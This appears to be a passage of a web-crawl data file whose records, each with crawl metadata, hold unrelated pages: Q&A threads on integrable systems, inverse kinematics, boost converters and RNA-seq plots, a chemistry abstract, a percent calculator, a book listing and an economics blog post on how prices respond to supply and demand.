msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4ca9be51-76ff-42aa-8d03-666bfe7e0750>\",\"WARC-Concurrent-To\":\"<urn:uuid:34ea0b74-1ceb-47e7-be1e-a936229f1027>\",\"WARC-IP-Address\":\"52.77.80.199\",\"WARC-Target-URI\":\"https://byjus.com/ncert-solutions-for-class-7-maths-chapter-1-integers-ex-1-1/\",\"WARC-Payload-Digest\":\"sha1:KFI7VJY5YIKOF25TEOPU63P33JBUSTRP\",\"WARC-Block-Digest\":\"sha1:467WP5KHK65PLLLVO7NGBFHSBRGA3CSS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250604397.40_warc_CC-MAIN-20200121132900-20200121161900-00194.warc.gz\"}"}
https://mathoverflow.net/questions/14638/integrable-dynamical-system-relation-to-elliptic-curves
[ "# Integrable dynamical system - relation to elliptic curves\n\nFrom seminar on kdV equation I know that for integrable dynamical system its trajectory in phase space lays on tori. In wikipedia article You may read (http://en.wikipedia.org/wiki/Integrable_system):\n\nWhen a finite dimensional Hamiltonian system is completely integrable in the Liouville sense, and the energy level sets are compact, the flows are complete, and the leaves of the invariant foliation are tori. There then exist, as mentioned above, special sets of canonical coordinates on the phase space known as action-angle variables, such that the invariant tori are the joint level sets of the action variables. These thus provide a complete set of invariants of the Hamiltonian flow (constants of motion), and the angle variables are the natural periodic coordinates on the torus. The motion on the invariant tori, expressed in terms of these canonical coordinates, is linear in the angle variables.\n\nAs I also know that elliptic curve is in fact some kind of tori, then there natural question arises: Are tori for quasi-periodic motion in action-angle variables of some dynamical systems related in any way to algebraic structure like elliptic curve? Maybe some small dynamical systems and some elliptic curves are related in some way?\n\nThe most interesting in this matter is for me the size of space of elliptic functions: its quite small, every elliptic curve is rational function of Weiestrass function, and its derivative. Has this property any analogy in integrable dynamical systems theory?\n\nAs isomorphic elliptic curves shares some invariants, it is also interesting it they have any \"dynamical meaning\".\n\n• This is a great question, but I do want to point out that KdV is an infinite-dimensional integrable system, so I am not sure if the tori interpretation makes sense in this setting. In particular, KdV admits infinitely many conservation laws! Drazin and Johnson's \"Solitons: an introduction\" expands on this. I realize this has no real bearing on the question on hand. – Justin Curry Feb 8 '10 at 17:19\n• As You are right, kdV has infinitely many conservation laws, it also is quasi-periodic motion! So probably it may be case of \"infinite dimensional\" tori, which obviously is not related to elliptic curves. I am physicist by education ( but not working as scientist, I treat math as fun and hobby), so kdV is something which is example of integrable system with nontrivial equations of motion. – kakaz Feb 8 '10 at 19:00\n\nIf your system is algebraic, then you bet! More generally, you can get abelian varieties as the fibers for many interesting integrable systems. Google the following for more: algebraic complete integrable Hamiltonian system, Calogero-Moser System, Hitchin System.\n\nAs for elliptic curves, they'll only pop out in low dimensional cases, because otherwise, the fibers have to have larger dimension.\n\nAs for the latter, it depends what you might want. I've seen the definition of integrable given by \"can be solved by a sequence of quadratures\" and in this terminology, you can check that an algebraic system you're always working with the global section of the theta function on the abelian variety, which is the unique (up to scaling) global section of the theta divisor on the abelian variety, which for an elliptic curve, is just the Weierstrass function.\n\n• If in low dimensional case, elliptic curves appear in this question, is it true that curves which are isomorphic arises in equivalent algebraic dynamical systems? Is this kind of homomorphism between structures? – kakaz Feb 8 '10 at 16:31\n• Well, really what's going on is that you have families of elliptic curves. I'm not an expert, really, but isomorphic families give equivalent integrable systems, and I'm not sure about what notion of equivalent systems you're using (and even if I did, I'm not sure I'd be able to say much). – Charles Siegel Feb 8 '10 at 17:30\n• I thought on case when moving from one curve to another in equivalence class gives for example change of variables in equation of motion or something like that - some kind of reparametrization which is not quite formal but also has some kind of \"physical meaning\". – kakaz Feb 8 '10 at 19:03\n• Perhaps. I don't know enough to say for certain. – Charles Siegel Feb 8 '10 at 20:08\n\n\"The de-geometrisation of mathematical education and the divorce from physics sever these ties. For example, not only students but also modern algebro-geometers on the whole do not know about the Jacobi fact mentioned here: an elliptic integral of first kind expresses the time of motion along an elliptic phase curve in the corresponding Hamiltonian system. \"\n\nFrom A.I.Arnold, here: http://pauli.uni-muenster.de/~munsteg/arnold.html Definitely I should learn more in this area...." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9073257,"math_prob":0.9293938,"size":1616,"snap":"2020-45-2020-50","text_gpt3_token_len":330,"char_repetition_ratio":0.12158809,"word_repetition_ratio":0.0,"special_character_ratio":0.18193069,"punctuation_ratio":0.10034602,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97538733,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T15:50:39Z\",\"WARC-Record-ID\":\"<urn:uuid:44245b00-1dfa-41e5-a6be-4bb06681db70>\",\"Content-Length\":\"140906\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:124b44c9-bd50-429b-ac3f-3fdb4d7f9d94>\",\"WARC-Concurrent-To\":\"<urn:uuid:d194bd9a-7bee-48a5-a47e-c6b38cd8b09f>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://mathoverflow.net/questions/14638/integrable-dynamical-system-relation-to-elliptic-curves\",\"WARC-Payload-Digest\":\"sha1:MMTBW6KO4TYM2CU4K7CJAT7P2ZEVD4CA\",\"WARC-Block-Digest\":\"sha1:P5WUSZNZBGWEXTC6HUANET4PO37YYAQS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141674594.59_warc_CC-MAIN-20201201135627-20201201165627-00566.warc.gz\"}"}
https://nl.mathworks.com/matlabcentral/cody/problems/44957-square-root-of-number/solutions/1914324
[ "Cody\n\n# Problem 44957. Square root of number\n\nSolution 1914324\n\nSubmitted on 28 Aug 2019 by Gergely Patay\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = 4; y_correct = 2; assert(isequal(your_fcn_name(x),y_correct))\n\nans = 2\n\n2   Pass\nx = 25; y_correct = 5; assert(isequal(your_fcn_name(x),y_correct))\n\nans = 5\n\n3   Pass\nx = 49; y_correct = 7; assert(isequal(your_fcn_name(x),y_correct))\n\nans = 7" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6420656,"math_prob":0.9927447,"size":493,"snap":"2019-43-2019-47","text_gpt3_token_len":161,"char_repetition_ratio":0.15337424,"word_repetition_ratio":0.0,"special_character_ratio":0.35091278,"punctuation_ratio":0.12903225,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9882614,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-20T14:19:01Z\",\"WARC-Record-ID\":\"<urn:uuid:1c3ed8eb-718c-439f-b17f-92646a069b4f>\",\"Content-Length\":\"72128\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:263151b2-d00f-4955-bb5a-3b7107df63b5>\",\"WARC-Concurrent-To\":\"<urn:uuid:6bd5f7da-4123-4217-941b-56c6136a5527>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://nl.mathworks.com/matlabcentral/cody/problems/44957-square-root-of-number/solutions/1914324\",\"WARC-Payload-Digest\":\"sha1:U3V2GRMR6CVEAL5KSUYCJUOFKSXWJUQB\",\"WARC-Block-Digest\":\"sha1:SVS2O2LZ7HHVLFCTDW4N3YAR6BFSLXNP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670559.66_warc_CC-MAIN-20191120134617-20191120162617-00482.warc.gz\"}"}
https://robotics.stackexchange.com/questions/23184/inverse-kinematics-for-2dof-robotic-arm-in-3d
[ "# Inverse kinematics for 2DOF robotic arm in 3D\n\ni am trying to find the inverse kinematics for quadrotor with 2Dof robotic arm, which has first joint rotation axis perpendicular with second joint. So, for the inverse kinematics i use two equations\n\ntheta 1 = atan2(z,y)\n\ntheta 2 = atan2(x, (sqrt(z^2 + y^2)-L1)), where x,y,z are end effector position\n\nIf I use these two solution in jacobean matrix for finding the joint velocities: thetadot = pinv(J)*(x,y,z)dot, at some point i have singular configuration. For finding the determinent of jacobean matrix, i consider the the determinant of the (J'*J) because my jacobean is a 3 * 2 matrix.\n\nSo my questions are\n\n1. are two equations for finding theta 1 and theta 2 correct?\n2. how can I avoid the singular configuration?\n3. when the jacobean matrix is zero, how can i find the joint velocities?\n• On Robotics we are fortunate enough to have MathJax support enabled, allowing you to easily create subscripts, superscripts, fractions, square roots, greek letters and more. This allows you to add both inline and block element mathematical expressions in robotics questions and answers. For a quick tutorial, take a look at How can I format mathematical expressions here, using MathJax?\n– Ben\nFeb 2, 2022 at 17:47\n• This paper treats the 2-D case, but perhaps it will give you some ideas. Most of the treatments I have seen are highly abstract, but this author (who is still at MIT after almost 50 years since he wrote the paper) gets \"down and dirty\". Feb 15, 2022 at 18:03" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8658455,"math_prob":0.96350706,"size":789,"snap":"2023-40-2023-50","text_gpt3_token_len":208,"char_repetition_ratio":0.12866242,"word_repetition_ratio":0.0,"special_character_ratio":0.24588086,"punctuation_ratio":0.11728395,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99762106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-28T18:41:16Z\",\"WARC-Record-ID\":\"<urn:uuid:ccd9add5-d831-4bf8-80e5-f37d6bb05d91>\",\"Content-Length\":\"163192\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:55510fae-ae4a-4549-8482-0df3eca063f0>\",\"WARC-Concurrent-To\":\"<urn:uuid:0df06d27-dec1-4875-b06b-5772acb9d4b8>\",\"WARC-IP-Address\":\"104.18.43.226\",\"WARC-Target-URI\":\"https://robotics.stackexchange.com/questions/23184/inverse-kinematics-for-2dof-robotic-arm-in-3d\",\"WARC-Payload-Digest\":\"sha1:BQSG6AP5DQOFSXNHPHORC2XP5ZAF7EWH\",\"WARC-Block-Digest\":\"sha1:VGGG3G7DBDBIOOFCGGKGJWM64RXQVZUJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679099942.90_warc_CC-MAIN-20231128183116-20231128213116-00028.warc.gz\"}"}
https://difusion.ulb.ac.be/vufind/Record/ULB-DIPOT:oai:dipot.ulb.ac.be:2013/236430/TOC
[ "Mon DI-fusion | À propos de DI-fusion | Contact |", null, "", null, "# Propriétés thermodynamiques des solutions associées\n\nArticle révisé par les pairs\n Résumé : Considering an associated solution, e. g. alcohol‐carbon tetrachloride, as a system of monomolecules and associated complexes in equilibrium with one another, it is shown that the thermodynamic properties, particularly activity coefficients, are completely determined by the chemical potentials of the monomolecules only. Using the principle of detailed balancing of elementary processes, it is shown that the following relation holds between the activity coefficients ƒA/ƒB = α where α is the fraction of molecules of the associated constituent which appear as monomolecules. This relation may be checked by comparing thermodynamic measurements of ƒA, and ƒB with values of a obtained from the spectroscopic study of the intensity of the OH monomolecular vibration band. Different statistical models are used for the calculation of the thermodynamic properties of the associated solutions. The results are compared and discussed. The influence of the size and shape of the associated complexes is studied. The calculated results are compared to the experimental ones for the systems (Formula Presented.) In these three cases, the relation ƒA/ƒB = α holds quite fairly. A direct proof is thus given that the deviations from ideality may be justified by the formation of complexes in these systems. In addition, the comparison of the observed activity coefficients and those calculated by the different statistical models used shows that, in concentrated solutions, an important part of the complexes must be formed by two or three dimensional molecular aggregates. A chain‐association alone is not sufficient to interpret the departures from ideality. Copyright © 1949 Wiley‐VCH Verlag GmbH & Co. KGaA, Weinheim" ]
[ null, "https://difusion.ulb.ac.be/vufind/images/fr.png", null, "https://difusion.ulb.ac.be/vufind/images/gb.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8702909,"math_prob":0.91892284,"size":2006,"snap":"2021-21-2021-25","text_gpt3_token_len":442,"char_repetition_ratio":0.11638362,"word_repetition_ratio":0.06849315,"special_character_ratio":0.19541375,"punctuation_ratio":0.11764706,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.952248,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-25T06:20:37Z\",\"WARC-Record-ID\":\"<urn:uuid:d67355af-4a64-4f43-b54c-3fda17b554e9>\",\"Content-Length\":\"71198\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ee7cb0aa-2c8b-4b76-95c1-e98969cb3b01>\",\"WARC-Concurrent-To\":\"<urn:uuid:9a645564-6071-47d7-ae93-ac69c2ae7076>\",\"WARC-IP-Address\":\"164.15.1.79\",\"WARC-Target-URI\":\"https://difusion.ulb.ac.be/vufind/Record/ULB-DIPOT:oai:dipot.ulb.ac.be:2013/236430/TOC\",\"WARC-Payload-Digest\":\"sha1:3I7DH2QHBJIVXI55SVAM6CZEE45LLFIM\",\"WARC-Block-Digest\":\"sha1:GXYJSCXMJJUZMMHUSAXSON5TYIRO5IKS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487622113.11_warc_CC-MAIN-20210625054501-20210625084501-00010.warc.gz\"}"}
https://answers.everydaycalculation.com/percent-of-what-number/70-55
[ "Solutions by everydaycalculation.com\n\n## 70 percent of what number is 55?\n\n55 is 70% of 78.57\n\n#### Steps to solve \"55 is 70 percent of what number?\"\n\n1. We have, 70% × x = 55\n2. or, 70/100 × x = 55\n3. Multiplying both sides by 100 and dividing both sides by 70,\nwe have x = 55 × 100/70\n4. x = 78.57\n\nIf you are using a calculator, simply enter 55×100÷70, which will give you the answer.\n\nMathStep (Works offline)", null, "Download our mobile app and learn how to work with percentages in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9274143,"math_prob":0.99901706,"size":568,"snap":"2022-27-2022-33","text_gpt3_token_len":167,"char_repetition_ratio":0.26950353,"word_repetition_ratio":0.23300971,"special_character_ratio":0.33978873,"punctuation_ratio":0.067226894,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99151826,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-11T00:13:02Z\",\"WARC-Record-ID\":\"<urn:uuid:a9aed4d2-c833-4b28-9d22-c13e4558335e>\",\"Content-Length\":\"6056\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5f94bafb-9b52-42ad-86af-b34c4b0d3f86>\",\"WARC-Concurrent-To\":\"<urn:uuid:ceebb9d2-1ec0-4c98-919d-ca3a2b5ce36e>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/percent-of-what-number/70-55\",\"WARC-Payload-Digest\":\"sha1:ZXSJXM5FGOPNRICE6S74VPCEDGIE2S4K\",\"WARC-Block-Digest\":\"sha1:HZC4JUTXT3UXVU4CR45Z35W7FRWS7DNA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571222.74_warc_CC-MAIN-20220810222056-20220811012056-00742.warc.gz\"}"}
https://www.firstworldpublications.com/product/rapidsol-statics-vector-calculus-g-n-d-u/
[ "Sale!\n\n# RAPIDSOL STATICS & VECTOR CALCULUS (G.N.D.U)\n\n450.00 360.00\n\nYou Save: 20%\n\nThe present book provides a comprehensive treatment of the concepts and topics by giving a vast variety of examples fully solved. The entire subject matter has been arranged in a systematic, graded, simple, lucid and exhaustive manner. Each chapter begins with some definitions followed by theorems with complete proofs and solved problems. A large number of notes and remarks have been added for a better understanding of the subject.\n\n## Description\n\nComposition and resolution of forces (Parallelogram law, polygon law, Lami’s Theorem, (l – m) theorem). Resultant of a number of coplanar forces, parallel forces.\n\nMoments : Varignon’s theorem of moments, Couples Resultant of two Coplanar Couples, Equilibrium of two Coplanar Couples, Resultant of a force and a couple. Equilibrium of coplanar forces. Friction, Laws of friction, Equilibrium of a particle on a rough plane. Centre of Gravity : Centre of gravity of a rod, Triangular lamina solid hemisphere, hollow hemisphere, solid cone and hollow cone.\n\nVector differentiation, Gradient, divergence and curl operators, line integrals, Vector identity, Vector integration, Theorems of Gauss, Green, Stokes and problems based on these.\n\n## Reviews\n\nThere are no reviews yet." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8082769,"math_prob":0.80940044,"size":779,"snap":"2021-43-2021-49","text_gpt3_token_len":177,"char_repetition_ratio":0.117419355,"word_repetition_ratio":0.0,"special_character_ratio":0.19383825,"punctuation_ratio":0.20833333,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9725861,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-23T08:44:42Z\",\"WARC-Record-ID\":\"<urn:uuid:e39feb5c-1a24-4ede-ac9c-cb0f5621c595>\",\"Content-Length\":\"72404\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4b6bb3e5-654b-46d1-ad9b-13c8ff2fe7e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:e0b74668-d166-4f0c-92ad-3898bb2f40a5>\",\"WARC-IP-Address\":\"103.159.84.93\",\"WARC-Target-URI\":\"https://www.firstworldpublications.com/product/rapidsol-statics-vector-calculus-g-n-d-u/\",\"WARC-Payload-Digest\":\"sha1:OFLCHFXKICMAHGB3NRMC5RFTHWPGFPF7\",\"WARC-Block-Digest\":\"sha1:GFXRJZ6VJIFXT5IM3Y6JPOZPUXOSARA6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585653.49_warc_CC-MAIN-20211023064718-20211023094718-00150.warc.gz\"}"}
https://electronics.stackexchange.com/questions/220254/boost-converter-with-input-referenced-output
[ "# Boost converter with input-referenced output\n\nI'm building my first switching DC/DC converter as part of a larger circuit. I need to convert a input voltage range to an overlapping output voltage (e.g. 3-5V in, 4V out). This would typically be done with a buck-boost or SEPIC converter. I thought of a way to use a simple boost converter IC instead. If it works, it allows me to go monolithic, while an equivalent buck-boost would require a controller + MOSFETs considering the ICs that manufacturers offer (high currents involved).\n\nBecause I don't need the output to be referenced to ground, I was planning to reference the load to the input voltage and change the switching IC feedback network to subtract the input voltage from the output.\n\nFor example, let's take a 4V output. Load is connected between input and output.\n\n• Input = 3V, the converter generates 7V (from ground), potential across load is 4V.\n• Input = 5V, the converter generates 9V (from ground), potential across load is 4V.\n\nIt seems to me like it should work and that I can calculate the inductor/switch current based on the actual voltage across the load. I searched a lot, but couldn't come up with much. The best I could find is the \"Negative-to-Positive Buck-Boost Converter\" circuit from page 24 of LT's AN19, which looks very similiar to what I'm talking about (with input voltage as ground and ground as negative voltage).\n\nCan this be done? If yes, can inductor and switch currents be calculated on the voltage across the load instead of the full ground-referenced one? Seems logical since the inductor is in series with the load, but if it's not true then I don't get any benefit out of this and I'll have to go with a controller.\n\n• One way is to use the calculation in the flyback section of the same app note you linked (start from page 30), just set the turn ratio N=1. Skip the snubber related stuff. As you already mentioned, you have to fix up the feedback to account for the offset. Mar 1, 2016 at 23:52", null, "" ]
[ null, "https://i.stack.imgur.com/1AoOT.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9385268,"math_prob":0.68110555,"size":1662,"snap":"2022-27-2022-33","text_gpt3_token_len":387,"char_repetition_ratio":0.12665862,"word_repetition_ratio":0.020833334,"special_character_ratio":0.22322503,"punctuation_ratio":0.094512194,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97506857,"pos_list":[0,1,2],"im_url_duplicate_count":[null,7,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T06:36:59Z\",\"WARC-Record-ID\":\"<urn:uuid:b8f8ceae-8d36-40d0-a879-6a483e0e3739>\",\"Content-Length\":\"227223\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b03bc60b-b7c3-4816-98e0-6a83857a2f7d>\",\"WARC-Concurrent-To\":\"<urn:uuid:30882ea6-3eba-4c3f-8806-1e5ea3947f28>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://electronics.stackexchange.com/questions/220254/boost-converter-with-input-referenced-output\",\"WARC-Payload-Digest\":\"sha1:QJYWG26X3X2IT3B3NJGPUFJRMRYQQE6J\",\"WARC-Block-Digest\":\"sha1:HIVXEOEN2UWWMCAHGBCI6THAC265UO4H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103328647.18_warc_CC-MAIN-20220627043200-20220627073200-00566.warc.gz\"}"}
https://www.biostars.org/p/456632/
[ "Question: RNA-Seq data Quality Assessment- BoxPlot Interpretation\n1\nAynur40 wrote:\n\nHello,\n\nHere is the boxplot, I got for my RNA-Seq data.", null, "My data is\n\n``````head(rawCountTable)\ncon-1 con-2 a-1 a-2 b-1 b-2 c-1 c-2 d-1 d-2\nENSMUSG0000000000 0 0 0 0 0 0 0 0 0 0\nENSMUSG00000000028 854 937 1143 1029 912 856 809 754 513 520\nENSMUSG00000000031 822918 817451 716860 691396 763705 829274 838094 819312 717935 730879\n``````\n\nThe code for Boxplot is below:\n\n``````pseudoCount = log2(rawCountTable + 1)\ndf = melt(pseudoCount, variable.name = \"Samples\",\nvalue.name = \"count\") # reshape the matrix\ndf = data.frame(df, Condition = substr(df\\$Samples, 1, 4))\n``````\n\nHere is my code for the density plot.\n\n``````ggplot(df, aes(x = count, colour = Samples, fill = Samples)) + ylim(c(0, 0.17)) + geom_density(alpha = 0.2, size = 1.25) + facet_wrap(~ Condition) + theme(legend.position = \"top\") + xlab(expression(log(count + 1)))\n``````\n\nThe density Plot is", null, "So, my question is I want to know how to interpret these plots? How is my data quality? If you can recommend me an article about understanding these plots and assess my data, I would appreciate it.\n\nThank you very much!\n\nmodified 9 weeks ago by rpolicastro2.0k • written 9 weeks ago by Aynur40\n\nThe image links are broken. Try hosting and embedding them by pressing the image button in the post.\n\nI've fixed it. OP used the embed code in image direct link field.\n\n2\nrpolicastro2.0k wrote:\n\nI don't think those plots are necessarily too informative about quality. If you want a general idea about the quality of the sequencing reads, use a program like FastQC. The alignment statistics from your aligner will then give you a good idea of the complexity of your library. If you plan on running differential expression on your data, you can generate PCA and heatmap plots, which will be a good first indicator of replicate concordance, and from those plots you can sometimes start seeing the difference between conditions. The DESeq2 is a good resource for making these plots.\n\nAlright. I already had my FastQC, and STAR aligning. I was making these plots to see between sample distribution prior to DEG analysis with DESeq2. These plots are mentioned in tutorials, and I am not sure if it is needed or not.\nIf this is not informing me of anything I should be aware of, then I will continue making PCA, MA plots, and DEG plots. Thanks." ]
[ null, "https://i.ibb.co/TtQRfw6/Boxplot.png", null, "https://i.ibb.co/gMdSsqN/Density-Plot.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7019928,"math_prob":0.9482936,"size":1245,"snap":"2020-45-2020-50","text_gpt3_token_len":398,"char_repetition_ratio":0.10394843,"word_repetition_ratio":0.028846154,"special_character_ratio":0.38313252,"punctuation_ratio":0.12741312,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96741295,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-26T19:06:42Z\",\"WARC-Record-ID\":\"<urn:uuid:db053861-0483-4b62-b1ba-00b0620e7542>\",\"Content-Length\":\"35190\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a56f11ff-ab3f-45ce-9037-2fdcb373fdff>\",\"WARC-Concurrent-To\":\"<urn:uuid:64e78f52-3ed2-4fd7-9fce-ead7960d027d>\",\"WARC-IP-Address\":\"69.164.220.180\",\"WARC-Target-URI\":\"https://www.biostars.org/p/456632/\",\"WARC-Payload-Digest\":\"sha1:GHSCZRFSLN5JTYEKHY3ULHRL6ZPSKDW7\",\"WARC-Block-Digest\":\"sha1:DJ35A2HLFCW2X3UBIT572ISWRTNIZ4MK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107891624.95_warc_CC-MAIN-20201026175019-20201026205019-00295.warc.gz\"}"}
https://informationtransfereconomics.blogspot.com/2016/05/what-happens-when-you-push-on-price.html
[ "## Monday, May 16, 2016\n\n### What happens when you push on a price?\n\nEd. note: This post has been sitting around because I never found a satisfying answer. However, this post from John Handley inspired a comment that led to a more scientific take on it.\nA lot of economics deals with situations where some entity impacts a market price: taxes, subsidies, or interest rates in general with a central bank. With the information equilibrium picture of economics, it's easy to say what happens when you change demand or supply ... the price is a detector of information flow.\n\nFor my thought experiments, I always like to think of an ideal gas with pressure $p$, energy $E$ and volume $V$ (analogous to price $p$, demand $D$ and supply $S$, respectively):\n\n$$p = k \\frac{E}{V}$$\n\nHow do I increase the pressure of the system? Well, I can reduce $V$ or increase $E$ (raise temperature or add more gas). One thing is for certain: grabbing the pressure needle and turning it will not raise the pressure of the gas! (This is like Nick Rowe's thought experiment of grabbing the speedometer needle).\n\n... at least under the conditions where the detector represents an ideal probe (the probe has minimal impact on the system ... like that pressure gauge or speedometer needle). But our probe is the market itself -- it is maximally connected to the system. Therefore when you push on a price (through a regulation, tax, minimum wage, or quota system), it does impact supply and/or demand. The and/or is critical because these impacts are observed to be empirically different.\n\nSince we don't know, we have to plead ignorance. Therefore price dynamics (for a short time and near equilibrium with $D \\approx D_{eq}$ and $S \\approx S_{eq}$) should follow:\n\n\\begin{align} \\frac{dp}{dt} = & a_{0} + a_{1} t + o(t^{2})\\\\ & + d_{10} (D - D_{eq}) + o(D^{2})\\\\ & + s_{10} (S - S_{eq}) + o(S^{2})\\\\ & + d_{11} \\frac{d}{dt} (D - D_{eq}) + o(D^{2})\\\\ & + s_{11} \\frac{d}{dt} (S - S_{eq}) + o(S^{2})\\\\ & + c_{20} (D - D_{eq})(S - S_{eq}) + o(D^{2}S^{2}) \\end{align}\n\nThis gives us an excellent way to organize a lot of effects. The leading constant coefficient would be where un-modeled macroeconomic inflation would go (it is a kind of mean field approximation). Entering into $a_{0}$ and $a_{1}$ would be non-ideal information transfer -- movements in the prices that have nothing to do with changes in supply and demand. Interestingly, these first terms also contain expectations.\n\nThe next terms do not make the assumption that $D_{eq} = S_{eq}$ or that they even adjust at the same rate. This covers the possibilities that demand could perpetually outstrip supply (leading to market-specific inflation -- housing comes to mind), and that demand adjust to price changes faster than supply does (or vice versa). For example, demand for gasoline is fairly constant for small shifts in price, so price changes reflect changes in supply ($d_{10} \\approx 0$). If you think pushing on a price moves you to a different equilibrium, then you might take $X_{eq} = X_{eq}(t)$, but we'll assume $dX_{eq}/dt = 0$ for now.\n\nBasically, your theory of economics determines the particular form of the expansion. The \"Walrasian\" assumption (per John Handley's post) is that $D = S$ always. Adding rational expectations of (constant) inflation leaves you with the model:\n\n$$\\frac{dp}{dt} = a_{0}$$\n\nAssuming information equilibrium yields a non-trivial restriction on the form of the expansion (see e.g. here for what happens when you add time to the information equilibrium condition). We obtain (taking $X - X_{eq} \\equiv \\Delta X$):\n\n$$\\frac{dp}{dt} = \\frac{k}{S_{eq}} \\frac{dD}{dt} - k \\frac{\\Delta S}{S_{eq}^{2}} \\frac{dD}{dt} - k \\frac{\\Delta D}{S_{eq}^{2}} \\frac{dS}{dt} + \\cdots$$\n\nWe find that almost all of the terms in the expansion above have zero coefficients. The leading term would be $d_{11} = k/S_{eq}$. The next terms would be the $c_{21}$ terms -- second order cross terms with one time derivative. Including only the lowest order terms and adding back in the possibility of non-ideal information transfer, we have\n\n$$\\frac{dp}{dt} = a_{0} + a_{1} t + \\frac{k}{S_{eq}} \\frac{dD}{dt}$$\n\nAll small price changes are due to (temporal) changes in demand or non-ideal information transfer! Integrating (dropping the higher order time term):\n\n$$p(t) - p(t_{0}) = a_{0} (t-t_{0}) + \\frac{k}{S_{eq}} (D(t) - D(t_{0}))$$\n\nThis means when you push on a price, at least to leading order, you impact demand (or cause non-ideal information transfer). It also has the opposite sign you might expect. An increase in price would increase demand! Note that this assumes general equilibrium (where demand and supply both adjust quickly to changes). But in general equilibrium, increasing demand means increasing supply as well, so we can understand the result that way. It could also be the case that nominal demand ($D$) goes up while real demand ($D/p$) goes down depending on the value of the coefficients.\n\nIf we assume demand adjusts slowly ($dD/dt \\approx 0$), then we get the \"Econ 101\" result (returning to information equilibrium) where an increase in price reduces demand, assuming supply is increasing (e.g. economic growth):\n\n$$\\frac{dp}{dt} = - k \\frac{\\Delta D}{S_{eq}^{2}} \\frac{dS}{dt}$$\n\nFor information 